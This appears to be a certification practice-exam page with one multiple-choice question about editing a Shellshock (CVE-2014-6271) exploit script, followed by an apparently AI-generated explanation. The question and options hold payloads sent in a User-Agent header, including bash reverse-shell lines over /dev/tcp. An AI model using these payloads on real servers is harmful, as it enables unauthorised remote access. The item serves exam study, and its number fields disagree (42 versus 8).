PT0-002 Question #42: Real Exam Question with Answer & Explanation

Question

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

Options

• Aexploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept":
• Bexploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find /-perm -4000", "Accept":
• Cexploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept":
• Dexploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept":

Explanation

{"question_number": 8, "correct_answer": "A", "explanation": "This is a Shellshock (CVE-2014-6271) exploit payload delivered via a malicious User-Agent header. The original code establishes a reverse bash shell back to 127.0.0.1:9090. To determine the user context (i.e., which OS user the web server process is running as), the tester should execute the id or whoami commands. Choice A replaces the reverse shell with id;whoami, which prints the current user's identity and group memberships directly. Choice B uses find with -perm -4000 to find SUID files, which is privilege escalation recon - not user context identification. Choice C uses ps -ef for process listing. Choice D just changes the reverse shell destination, not the goal.", "generated_by": "claude-sonnet", "llm_judge_score": 4}

No community discussion yet for this question.